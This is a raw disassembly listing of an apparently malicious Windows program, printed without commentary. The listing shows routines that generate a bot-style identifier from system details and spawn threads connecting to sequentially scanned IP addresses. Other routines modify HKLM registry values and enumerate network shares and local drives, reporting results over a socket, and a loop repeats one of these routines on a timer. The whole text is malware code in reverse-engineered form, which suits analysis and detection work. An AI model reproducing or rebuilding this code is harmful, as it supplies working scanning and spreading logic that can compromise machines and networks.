sub esp, 0C8h
push ebx
push esi
lea eax, [ebp-0C8h]
push edi
push eax
mov edi, 440F9Ch
mov dword ptr [ebp-0C8h], 94h
call GetVersionExA ; GetVersionExA
cmp dword ptr [ebp-0C4h], 4
push 0Ah
pop ebx
jnz short loc_416617
cmp dword ptr [ebp-0C0h], 0
jnz short loc_4165F8
cmp dword ptr [ebp-0B8h], 1
jnz short loc_4165E8
mov edi, 42FD90h
loc_4165E8: ; CODE XREF: .text:004165E1�j
cmp dword ptr [ebp-0B8h], 2
jnz short loc_416653
mov edi, 42FD8Ch
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_4165F8: ; CODE XREF: .text:004165D8�j
cmp [ebp-0C0h], ebx
jnz short loc_416607
mov edi, 42FD88h
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_416607: ; CODE XREF: .text:004165FE�j
cmp dword ptr [ebp-0C0h], 5Ah
jnz short loc_41664E
mov edi, 42FD84h
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_416617: ; CODE XREF: .text:004165CF�j
cmp dword ptr [ebp-0C4h], 5
jnz short loc_41664E
cmp dword ptr [ebp-0C0h], 0
jnz short loc_416630
mov edi, 42FD80h
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_416630: ; CODE XREF: .text:00416627�j
cmp dword ptr [ebp-0C0h], 1
jnz short loc_416640
mov edi, 42FD7Ch
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_416640: ; CODE XREF: .text:00416637�j
cmp dword ptr [ebp-0C0h], 2
mov edi, 43D5ACh
jz short loc_416653
loc_41664E: ; CODE XREF: .text:0041660E�j
; .text:0041661E�j
mov edi, 43D5A8h
loc_416653: ; CODE XREF: .text:004165EF�j
; .text:004165F6�j ...
lea eax, [ebp-0B4h]
push 440FACh
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_416671
mov esi, 43D5A4h
jmp short loc_4166EC
; ---------------------------------------------------------------------------
loc_416671: ; CODE XREF: .text:00416668�j
lea eax, [ebp-0B4h]
push 436F48h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_41668F
mov esi, 43D5A0h
jmp short loc_4166EC
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: .text:00416686�j
lea eax, [ebp-0B4h]
push 42FAA4h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4166AD
mov esi, 43D59Ch
jmp short loc_4166EC
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: .text:004166A4�j
lea eax, [ebp-0B4h]
push 43D598h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4166CB
mov esi, 43D594h
jmp short loc_4166EC
; ---------------------------------------------------------------------------
loc_4166CB: ; CODE XREF: .text:004166C2�j
lea eax, [ebp-0B4h]
push 43D590h
push eax
call sub_417F60
pop ecx
mov esi, 43D58Ch
test eax, eax
pop ecx
jnz short loc_4166EC
mov esi, 43D588h
loc_4166EC: ; CODE XREF: .text:0041666F�j
; .text:0041668D�j ...
push dword ptr [ebp+8]
call sub_40B972
push eax
call sub_40B7CA
pop ecx
test eax, eax
pop ecx
lea eax, [ebp-34h]
jz short loc_41670A
push 42FB10h
jmp short loc_41670F
; ---------------------------------------------------------------------------
loc_41670A: ; CODE XREF: .text:00416701�j
push 43D584h
loc_41670F: ; CODE XREF: .text:00416708�j
push 10h
push eax
call sub_417EDA
add esp, 0Ch
lea eax, [ebp-8]
or dword ptr [ebp-4], 0FFFFFFFFh
or dword ptr [ebp-0Ch], 0FFFFFFFFh
push eax
or dword ptr [ebp-8], 0FFFFFFFFh
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-4]
push eax
push 42FC64h
push 0
call sub_40C21E
pop ecx
push eax
call sub_418ED7
mov eax, [ebp-4]
add esp, 14h
cmp eax, ebx
jge short loc_416764
push eax
push 43D580h
lea eax, [ebp-18h]
push ebx
push eax
call sub_417EDA
add esp, 10h
jmp short loc_416788
; ---------------------------------------------------------------------------
loc_416764: ; CODE XREF: .text:0041674D�j
cmp eax, 64h
jge short loc_416776
lea ecx, [ebp-18h]
push ebx
push ecx
push eax
call sub_423196
jmp short loc_416785
; ---------------------------------------------------------------------------
loc_416776: ; CODE XREF: .text:00416767�j
push 43D57Ch
lea eax, [ebp-18h]
push ebx
push eax
call sub_417EDA
loc_416785: ; CODE XREF: .text:00416774�j
add esp, 0Ch
loc_416788: ; CODE XREF: .text:00416762�j
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
pop ecx
lea eax, [ebp-24h]
push ebx
push eax
push 7
push 800h
call GetLocaleInfoA ; GetLocaleInfoA
lea eax, [ebp-34h]
push eax
push esi
lea eax, [ebp-18h]
push edi
mov edi, [ebp+0Ch]
push eax
lea eax, [ebp-24h]
push eax
push 43D56Ch
push 1Ch
push edi
call sub_417EDA
xor esi, esi
add esp, 20h
cmp dword_4315BC, esi
jle short loc_4167F7
loc_4167D2: ; CODE XREF: .text:004167F5�j
call sub_4179B7
cdq
mov ecx, ebx
idiv ecx
push edx
push edi
push 43D564h
push 1Ch
push edi
call sub_417EDA
add esp, 14h
inc esi
cmp esi, dword_4315BC
jl short loc_4167D2
loc_4167F7: ; CODE XREF: .text:004167D0�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167FE proc near ; CODE XREF: sub_41689B+61�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0 ; lpWindowName
push offset ClassName ; lpClassName
mov esi, eax
call FindWindowA ; FindWindowA
cmp esi, 64h
jbe short loc_41684D
test eax, eax
mov eax, 43D5B8h
jnz short loc_416836
mov eax, 440F9Ch
loc_416836: ; CODE XREF: sub_4167FE+31�j
push eax
push esi
push 43D5B0h
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_417EDA
add esp, 14h
jmp short loc_416867
; ---------------------------------------------------------------------------
loc_41684D: ; CODE XREF: sub_4167FE+28�j
test eax, eax
mov eax, 43D5B8h
jnz short loc_41685B
mov eax, 440F9Ch
loc_41685B: ; CODE XREF: sub_4167FE+56�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41795B
pop ecx
pop ecx
loc_416867: ; CODE XREF: sub_4167FE+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_4180D0
pop ecx
cmp eax, 2
pop esi
jbe short loc_416896
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_419440
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_419300
add esp, 18h
loc_416896: ; CODE XREF: sub_4167FE+77�j
mov eax, [ebp+arg_0]
leave
retn
sub_4167FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41689B proc near ; CODE XREF: sub_40F8D6+CE�p
; sub_40FB24+53�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_4168A4: ; CODE XREF: sub_41689B+40�j
cmp [ebp+arg_10], 0
jz short loc_4168C2
lea eax, [esi+43D528h]
push eax
push [ebp+arg_10]
call sub_417D80
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4168D0
; ---------------------------------------------------------------------------
loc_4168C2: ; CODE XREF: sub_41689B+D�j
mov ecx, [esi+43D534h]
xor eax, eax
cmp ecx, [ebp+arg_8]
setz al
loc_4168D0: ; CODE XREF: sub_41689B+25�j
test eax, eax
jnz short loc_4168DF
add esi, 14h
inc edi
cmp esi, 3Ch
jb short loc_4168A4
jmp short loc_4168F1
; ---------------------------------------------------------------------------
loc_4168DF: ; CODE XREF: sub_41689B+37�j
push [ebp+arg_4]
lea eax, [edi+edi*4]
push [ebp+arg_0]
call dword ptr unk_43D538[eax*4]
pop ecx
pop ecx
loc_4168F1: ; CODE XREF: sub_41689B+42�j
cmp [ebp+arg_C], 0
pop edi
pop esi
jz short loc_416904
push [ebp+arg_4]
call sub_4167FE
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_416904: ; CODE XREF: sub_41689B+5C�j
mov eax, [ebp+arg_4]
pop ebp
retn
sub_41689B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_416909(LPVOID)
sub_416909 proc near ; DATA XREF: sub_4169D6+7B�o
s = dword ptr -0B8h
var_B4 = dword ptr -0B4h
hostshort = word ptr -34h
var_2C = dword ptr -2Ch
in = in_addr ptr -28h
var_20 = dword ptr -20h
name = sockaddr ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+s]
push 10h
rep movsd
xor esi, esi
push 0
inc esi
mov [eax+0A4h], esi
lea eax, [ebp+name]
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov word ptr [ebp+name.sa_data], ax
mov eax, dword ptr [ebp+in.S_un]
push 6 ; protocol
push esi ; type
push 2 ; af
mov dword ptr [ebp+name.sa_data+2], eax
call socket_0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4169C7
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect_0
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov [ecx+44B874h], esi
jz short loc_4169C7
push dword ptr [ebp+hostshort]
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa_0
push eax
mov edi, 51A098h
push 43D5BCh
push edi
call sub_41795B
push 0 ; int
lea eax, [ebp+var_B4]
push [ebp+var_20] ; int
push edi ; int
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
push edi
call sub_40CB08
add esp, 28h
loc_4169C7: ; CODE XREF: sub_416909+5D�j
; sub_416909+7E�j
push esi ; s
call closesocket_0
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_416909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4169D6(LPVOID)
sub_4169D6 proc near ; DATA XREF: sub_40FCA3+36AB�o
var_130 = byte ptr -130h
Parameter = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
in = in_addr ptr -20h
var_C = dword ptr -0Ch
ThreadId = dword ptr -8
var_4 = dword ptr -4
hostlong = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+hostlong]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+Parameter]
rep movsd
mov esi, Sleep
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_416A04: ; CODE XREF: sub_4169D6+EC�j
push [ebp+var_2C]
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_130]
push 43D5F4h
push eax
call sub_41795B
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, 44B668h
push eax
call sub_419300
add esp, 1Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push edi ; dwCreationFlags
push eax ; lpParameter
push offset sub_416909 ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_416A70
jmp short loc_416A6B
; ---------------------------------------------------------------------------
loc_416A67: ; CODE XREF: sub_4169D6+98�j
push 32h ; dwMilliseconds
call esi ; Sleep
loc_416A6B: ; CODE XREF: sub_4169D6+8F�j
cmp [ebp+var_C], edi
jz short loc_416A67
loc_416A70: ; CODE XREF: sub_4169D6+8D�j
push [ebp+var_4]
call dword ptr byte_424074+4
push dword ptr [ebx+88h] ; dwMilliseconds
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+in]
push 4
push eax
lea eax, [ebp+hostlong]
push eax
call sub_417A40
add esp, 0Ch
push [ebp+hostlong] ; hostlong
call htonl ; htonl
inc eax
push eax ; hostlong
mov [ebp+hostlong], eax
call htonl_0
mov [ebp+hostlong], eax
lea eax, [ebp+hostlong]
push 4
push eax
lea eax, [ebp+in]
push eax
call sub_417A40
add esp, 0Ch
jmp loc_416A04
sub_4169D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_416AC7(LPVOID)
sub_416AC7 proc near ; DATA XREF: sub_40FCA3+60CD�o
s = dword ptr -98h
var_94 = dword ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+s]
rep movsd
pop edi
pop esi
push [ebp+var_8] ; int
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C] ; int
push eax ; int
push [ebp+s] ; s
jz short loc_416B0E
call sub_416B27
jmp short loc_416B13
; ---------------------------------------------------------------------------
loc_416B0E: ; CODE XREF: sub_416AC7+3E�j
call sub_416E4D
loc_416B13: ; CODE XREF: sub_416AC7+45�j
add esp, 10h
push [ebp+var_14]
call sub_417735
pop ecx
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_416AC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416B27(SOCKET s, int, int, int)
sub_416B27 proc near ; CODE XREF: sub_416AC7+40�p
; sub_417169+8�p
var_214 = dword ptr -214h
totalentries = dword ptr -14h
var_10 = dword ptr -10h
resume_handle = dword ptr -0Ch
bufptr = byte ptr -8
entriesread = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword ptr byte_445EDC+14h, edi
jnz loc_416C59
lea eax, [ebp+entriesread]
mov esi, 80000002h
push eax ; phkResult
push 2001Fh ; samDesired
push edi ; ulOptions
push offset byte_431738 ; lpSubKey
push esi ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_416BB2
mov ax, word ptr unk_43D9B4
mov word ptr [ebp+bufptr+2], ax
lea eax, [ebp+bufptr+2]
push eax
call sub_4180D0
pop ecx
push eax ; cbData
lea eax, [ebp+bufptr+2]
push eax ; lpData
push 1 ; dwType
push edi ; Reserved
push offset byte_43D9A8 ; lpValueName
push [ebp+entriesread] ; hKey
call RegSetValueExA ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_416B9A
push 43D974h
jmp short loc_416B9F
; ---------------------------------------------------------------------------
loc_416B9A: ; CODE XREF: sub_416B27+6A�j
push 43D948h
loc_416B9F: ; CODE XREF: sub_416B27+71�j
push eax
call sub_41795B
pop ecx
pop ecx
push [ebp+entriesread] ; hKey
call RegCloseKey ; RegCloseKey
jmp short loc_416BC5
; ---------------------------------------------------------------------------
loc_416BB2: ; CODE XREF: sub_416B27+36�j
lea eax, [ebp+var_214]
push 43D908h
push eax
call sub_41795B
pop ecx
pop ecx
loc_416BC5: ; CODE XREF: sub_416B27+89�j
cmp [ebp+arg_C], edi
jnz short loc_416BE4
push 1 ; int
lea eax, [ebp+var_214]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416BE4: ; CODE XREF: sub_416B27+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40CB08
pop ecx
lea eax, [ebp+entriesread]
push eax ; phkResult
push 0F003Fh ; samDesired
push edi ; ulOptions
push offset byte_431750 ; lpSubKey
push esi ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_416C52
lea eax, [ebp+bufptr]
push 4 ; cbData
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset byte_43D8F4 ; lpValueName
push [ebp+entriesread] ; hKey
mov dword ptr [ebp+bufptr], 1
call RegSetValueExA ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_416C3A
push 43D8A8h
jmp short loc_416C3F
; ---------------------------------------------------------------------------
loc_416C3A: ; CODE XREF: sub_416B27+10A�j
push 43D860h
loc_416C3F: ; CODE XREF: sub_416B27+111�j
push eax
call sub_41795B
pop ecx
pop ecx
push [ebp+entriesread] ; hKey
call RegCloseKey ; RegCloseKey
jmp short loc_416C6C
; ---------------------------------------------------------------------------
loc_416C52: ; CODE XREF: sub_416B27+E2�j
push 43D810h
jmp short loc_416C5E
; ---------------------------------------------------------------------------
loc_416C59: ; CODE XREF: sub_416B27+13�j
push 43D7CCh
loc_416C5E: ; CODE XREF: sub_416B27+130�j
lea eax, [ebp+var_214]
push eax
call sub_41795B
pop ecx
pop ecx
loc_416C6C: ; CODE XREF: sub_416B27+129�j
cmp [ebp+arg_C], edi
jnz short loc_416C8B
push 1 ; int
lea eax, [ebp+var_214]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416C8B: ; CODE XREF: sub_416B27+148�j
lea eax, [ebp+var_214]
push eax
call sub_40CB08
cmp dword ptr byte_445EDC+3Ch, edi
pop ecx
jnz loc_416E08
push ebx
mov [ebp+entriesread], edi
mov [ebp+totalentries], edi
mov [ebp+resume_handle], edi
loc_416CAE: ; CODE XREF: sub_416B27+2C5�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
lea eax, [ebp+bufptr]
push 0FFFFFFFFh ; prefmaxlen
push eax ; bufptr
push 1F6h ; level
push edi ; servername
call NetShareEnum
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_416D4D
cmp eax, 0EAh
jz short loc_416D4D
xor esi, esi
loc_416CDC: ; CODE XREF: sub_416B27+21F�j
push dword ptr [esi+43D634h] ; int
push edi ; lpMultiByteStr
call sub_40E82A
pop ecx
pop ecx
push dword ptr [esi+43D634h]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_416D01
push 43D798h
jmp short loc_416D06
; ---------------------------------------------------------------------------
loc_416D01: ; CODE XREF: sub_416B27+1D1�j
push 43D75Ch
loc_416D06: ; CODE XREF: sub_416B27+1D8�j
push 200h
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_416D33
push 1 ; int
lea eax, [ebp+var_214]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416D33: ; CODE XREF: sub_416B27+1F0�j
lea eax, [ebp+var_214]
push eax
call sub_40CB08
add esi, 8
pop ecx
cmp esi, 20h
jb short loc_416CDC
jmp loc_416DE5
; ---------------------------------------------------------------------------
loc_416D4D: ; CODE XREF: sub_416B27+1AA�j
; sub_416B27+1B1�j
mov esi, dword ptr [ebp+bufptr]
xor ebx, ebx
inc ebx
cmp [ebp+entriesread], ebx
jb loc_416DDC
loc_416D5C: ; CODE XREF: sub_416B27+2B1�j
mov edi, [esi]
push edi
call sub_41A0EC
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_416DD1
push edi ; lpWideCharStr
call sub_40E717
push eax ; int
push 0 ; lpMultiByteStr
call sub_40E82A
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_416D91
push 43D728h
jmp short loc_416D96
; ---------------------------------------------------------------------------
loc_416D91: ; CODE XREF: sub_416B27+261�j
push 43D6ECh
loc_416D96: ; CODE XREF: sub_416B27+268�j
push 200h
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_416DC4
push 1 ; int
lea eax, [ebp+var_214]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416DC4: ; CODE XREF: sub_416B27+281�j
lea eax, [ebp+var_214]
push eax
call sub_40CB08
pop ecx
loc_416DD1: ; CODE XREF: sub_416B27+244�j
add esi, 28h
inc ebx
cmp ebx, [ebp+entriesread]
jbe short loc_416D5C
xor edi, edi
loc_416DDC: ; CODE XREF: sub_416B27+22F�j
push dword ptr [ebp+bufptr] ; Buffer
call NetApiBufferFree
loc_416DE5: ; CODE XREF: sub_416B27+221�j
cmp [ebp+var_10], 0EAh
jz loc_416CAE
lea eax, [ebp+var_214]
push 43D6B4h
push eax
call sub_41795B
pop ecx
pop ecx
pop ebx
jmp short loc_416E1B
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: sub_416B27+177�j
lea eax, [ebp+var_214]
push 43D674h
push eax
call sub_41795B
pop ecx
pop ecx
loc_416E1B: ; CODE XREF: sub_416B27+2DF�j
cmp [ebp+arg_C], edi
jnz short loc_416E39
push edi ; int
lea eax, [ebp+var_214]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416E39: ; CODE XREF: sub_416B27+2F7�j
lea eax, [ebp+var_214]
push eax
call sub_40CB08
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_416B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416E4D(SOCKET s, int, int, int)
sub_416E4D proc near ; CODE XREF: sub_416AC7:loc_416B0E�p
var_220 = dword ptr -220h
RootPathName = byte ptr -20h
var_14 = dword ptr -14h
Data = byte ptr -8
hKey = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword ptr byte_445EDC+14h, ebx
push esi
jnz loc_416F7B
lea eax, [ebp+hKey]
mov esi, 80000002h
push eax ; phkResult
push 2001Fh ; samDesired
push ebx ; ulOptions
push offset byte_431738 ; lpSubKey
push esi ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_416ED8
mov ax, word ptr unk_43DBA4
mov word ptr [ebp+Data+2], ax
lea eax, [ebp+Data+2]
push eax
call sub_4180D0
pop ecx
push eax ; cbData
lea eax, [ebp+Data+2]
push eax ; lpData
push 1 ; dwType
push ebx ; Reserved
push offset byte_43D9A8 ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExA ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_416EC0
push 43DB70h
jmp short loc_416EC5
; ---------------------------------------------------------------------------
loc_416EC0: ; CODE XREF: sub_416E4D+6A�j
push 43DB44h
loc_416EC5: ; CODE XREF: sub_416E4D+71�j
push eax
call sub_41795B
pop ecx
pop ecx
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
jmp short loc_416EEB
; ---------------------------------------------------------------------------
loc_416ED8: ; CODE XREF: sub_416E4D+36�j
lea eax, [ebp+var_220]
push 43D908h
push eax
call sub_41795B
pop ecx
pop ecx
loc_416EEB: ; CODE XREF: sub_416E4D+89�j
cmp [ebp+arg_C], ebx
jnz short loc_416F0A
push 1 ; int
lea eax, [ebp+var_220]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416F0A: ; CODE XREF: sub_416E4D+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40CB08
pop ecx
lea eax, [ebp+hKey]
push eax ; phkResult
push 0F003Fh ; samDesired
push ebx ; ulOptions
push offset byte_431750 ; lpSubKey
push esi ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_416F74
lea eax, [ebp+Data]
push 4 ; cbData
push eax ; lpData
push 4 ; dwType
push ebx ; Reserved
push offset byte_43D8F4 ; lpValueName
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], ebx
call RegSetValueExA ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_416F5C
push 43DAF8h
jmp short loc_416F61
; ---------------------------------------------------------------------------
loc_416F5C: ; CODE XREF: sub_416E4D+106�j
push 43DAB0h
loc_416F61: ; CODE XREF: sub_416E4D+10D�j
push eax
call sub_41795B
pop ecx
pop ecx
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
jmp short loc_416F8E
; ---------------------------------------------------------------------------
loc_416F74: ; CODE XREF: sub_416E4D+E2�j
push 43DA60h
jmp short loc_416F80
; ---------------------------------------------------------------------------
loc_416F7B: ; CODE XREF: sub_416E4D+13�j
push 43D7CCh
loc_416F80: ; CODE XREF: sub_416E4D+12C�j
lea eax, [ebp+var_220]
push eax
call sub_41795B
pop ecx
pop ecx
loc_416F8E: ; CODE XREF: sub_416E4D+125�j
cmp [ebp+arg_C], ebx
jnz short loc_416FAD
push 1 ; int
lea eax, [ebp+var_220]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416FAD: ; CODE XREF: sub_416E4D+144�j
lea eax, [ebp+var_220]
push eax
call sub_40CB08
cmp dword ptr byte_445EDC+3Ch, ebx
pop ecx
jnz loc_417124
push edi
xor esi, esi
mov edi, 200h
loc_416FCE: ; CODE XREF: sub_416E4D+1EE�j
push dword ptr [esi+43D638h] ; int
push dword ptr [esi+43D634h] ; int
push ebx ; lpMultiByteStr
call sub_40E77E
add esp, 0Ch
push dword ptr [esi+43D634h]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_416FFA
push 43DA30h
jmp short loc_416FFF
; ---------------------------------------------------------------------------
loc_416FFA: ; CODE XREF: sub_416E4D+1A4�j
push 43D9F8h
loc_416FFF: ; CODE XREF: sub_416E4D+1AB�j
push edi
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_417028
push 1 ; int
lea eax, [ebp+var_220]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_417028: ; CODE XREF: sub_416E4D+1BF�j
lea eax, [ebp+var_220]
push eax
call sub_40CB08
add esi, 8
pop ecx
cmp esi, 10h
jb short loc_416FCE
call GetLogicalDrives ; GetLogicalDrives
test eax, eax
mov [ebp+hKey], eax
mov bl, 41h
jz loc_41710C
loc_417050: ; CODE XREF: sub_416E4D+2B9�j
mov eax, [ebp+hKey]
and eax, 1
cmp al, 1
jnz loc_417101
cmp bl, 41h
jz loc_417101
movsx esi, bl
push esi
push 43D9F4h
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_417EDA
push esi
push 43D9ECh
lea eax, [ebp+RootPathName]
push 0Ah
push eax
call sub_417EDA
add esp, 20h
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
call GetDriveTypeA ; GetDriveTypeA
cmp eax, 3
jnz short loc_417101
lea eax, [ebp+RootPathName]
push eax ; int
lea eax, [ebp+var_14]
push eax ; int
push 0 ; lpMultiByteStr
call sub_40E77E
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_4170C5
push 43DA30h
jmp short loc_4170CA
; ---------------------------------------------------------------------------
loc_4170C5: ; CODE XREF: sub_416E4D+26F�j
push 43D9F8h
loc_4170CA: ; CODE XREF: sub_416E4D+276�j
push edi
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4170F4
push 1 ; int
lea eax, [ebp+var_220]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4170F4: ; CODE XREF: sub_416E4D+28B�j
lea eax, [ebp+var_220]
push eax
call sub_40CB08
pop ecx
loc_417101: ; CODE XREF: sub_416E4D+20B�j
; sub_416E4D+214�j ...
inc bl
shr [ebp+hKey], 1
jnz loc_417050
loc_41710C: ; CODE XREF: sub_416E4D+1FD�j
lea eax, [ebp+var_220]
push 43D9B8h
push eax
call sub_41795B
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_417137
; ---------------------------------------------------------------------------
loc_417124: ; CODE XREF: sub_416E4D+173�j
lea eax, [ebp+var_220]
push 43D674h
push eax
call sub_41795B
pop ecx
pop ecx
loc_417137: ; CODE XREF: sub_416E4D+2D5�j
cmp [ebp+arg_C], ebx
jnz short loc_417155
push ebx ; int
lea eax, [ebp+var_220]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_417155: ; CODE XREF: sub_416E4D+2ED�j
lea eax, [ebp+var_220]
push eax
call sub_40CB08
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_416E4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_417169(LPVOID)
sub_417169 proc near ; CODE XREF: sub_417169+1C�j
; DATA XREF: sub_40F1EA+4D7�o
push 1 ; int
push 0 ; int
push 0 ; int
push 0 ; s
call sub_416B27
add esp, 10h
push dword_43D630 ; dwMilliseconds
call Sleep ; Sleep
jmp short sub_417169
sub_417169 endp
